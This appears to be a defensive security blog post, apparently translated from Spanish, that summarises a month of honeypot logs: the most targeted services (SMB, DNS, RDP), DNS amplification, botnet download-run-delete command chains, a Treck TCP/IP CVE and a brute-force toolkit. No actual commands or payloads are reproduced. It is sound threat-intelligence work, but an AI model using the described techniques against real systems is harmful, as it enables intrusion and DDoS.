return
One month after creating our honeypot from scratch, designed to analyze attackers, their goals, patterns, and actions, we will see what it managed to capture, the most targeted services, the vulnerabilities attempted to exploit, and the origins of these attacks. The first thing we notice when entering the Kibana visualization panel is the staggering numbers of attacks on the deployed honeypots. The total number of received attacks approaches 3 milliones with 70% originating from just two honeypots, Dionaea y DDoSPot.
If we filter by the source IP addresses, from which the attacks originate, we see that one IP has more than 300,000 attacks on the Dionaea honeypot (the number is redacted for security reasons). We cannot determine if this source IP is actually an attacker or if it is another one of the many victims being used by a cybercriminal.
When it comes to services, the most targeted in our honeypot is undoubtedly SMB (port 445/tcp) with over half a million attacks coming from all around the world, as shown in the following graph.
Attackers were looking for publicly shared folders that might contain sensitive information about the organization to download their content and use it for future attacks or for commercial or extortion purposes. However, the second most attacked service/port was 53/udp. In this case, the attackers were not seeking information but using our infrastructure to launch distributed denial-of-service (DDoS) attacks on other victims. This type of attack is commonly known as DNS amplification DDoS. Most of these domains are managed by governments, as they have the .gov top-level domain (TLD). Some of them are listed below.
The Remote Desktop Protocol is our third most attacked service, recording a total of nearly 500.000 attacks, The adversaries are trying to add our server to their botnet network. By gaining remote control of the server, they can carry out other attacks, mine cryptocurrencies, use reconnaissance techniques to compromise another asset of an organization, and more. The possibilities are countless.
As mentioned earlier, the connections come from all over the world, making it difficult to determine if we are being attacked by a botnet, a specific actor, or automated scripts searching for this exposed service.
Since deploying our honeypot network, we have received thousands of attacks, but one type of behavior prevails: automation. Let's take a closer look at this. To analyze this attack methodology, we will use the logs from the Cowrie honeypot. This honeypot simulates an SSH service (port 22/tcp) and a Telnet service (port 23/tcp). Once the attacker manages to log in to one of these services, they execute a series of concatenated commands, similar to the following:
This will clean up a previously downloaded file with the same name, download a script from one of their servers where it is hosted, and once downloaded, execute it. The content of the previously downloaded file can be seen below:
This script, in turn, downloads other malicious binaries with different objectives, ranging from using our infrastructure to mine cryptocurrencies, saving all executed actions within the victim, to expanding their botnet and increasing their attack power. The files are often hosted on web servers (port 80/tcp), but we have also seen them being downloaded from FTP services (port 21/tcp) using the "anonymous" (guest) user to access the service
Another technique observed throughout all the attacks is that after downloading a malicious binary and executing it, the same binary is deleted from the system to avoid leaving traces of the executables. We have also seen that some requests to these servers hosting the malicious binaries return an HTTP 404 status code (File Not Found).
In our Kibana visualization panel, with the help of Suricata, we can see the exploited Common Vulnerabilities and Exposures (CVE). In fact, there is one CVE that was attempted to be exploited more than 1000 times , el CVE-2020-11899 que which is a vulnerability in Treck's TCP/IP stack in versions prior to 6.0.1.66.
Furthermore, analyzing the commands used by the attackers, one SSH session contained 1000 identical lines mentioning the phrase "RyM_Gang".
Searching for this phrase in various online resources, we found a GitHub repository containing a series of scripts used for brute-forcing various services (SSH, Telnet, etc.).
Once these scripts manage to gain access to one of the services, they verify that commands can actually be executed within the service by using an echo and subsequently searching for that line.
We have confirmed that honeypots are one of the most effective tools in Active Cyber Defense to gather information about attackers. They allow us to directly and efficiently understand the actions of these mostly automated actors and the types of attacks we must deal with on a daily basis as defenders. It is worth noting that our cloud service provider sent security alerts to the registered email, mentioning configuration errors in some of our services and providing guidance on how to solve these problems. In general, we observed that the attacks we received were mostly automated, aiming to gain profit with minimal effort, from expanding their botnets to utilizing our infrastructure for their benefit.
In upcoming posts, we will continue exploring more techniques within Active Cyber Defense to enhance the security level of our organization.
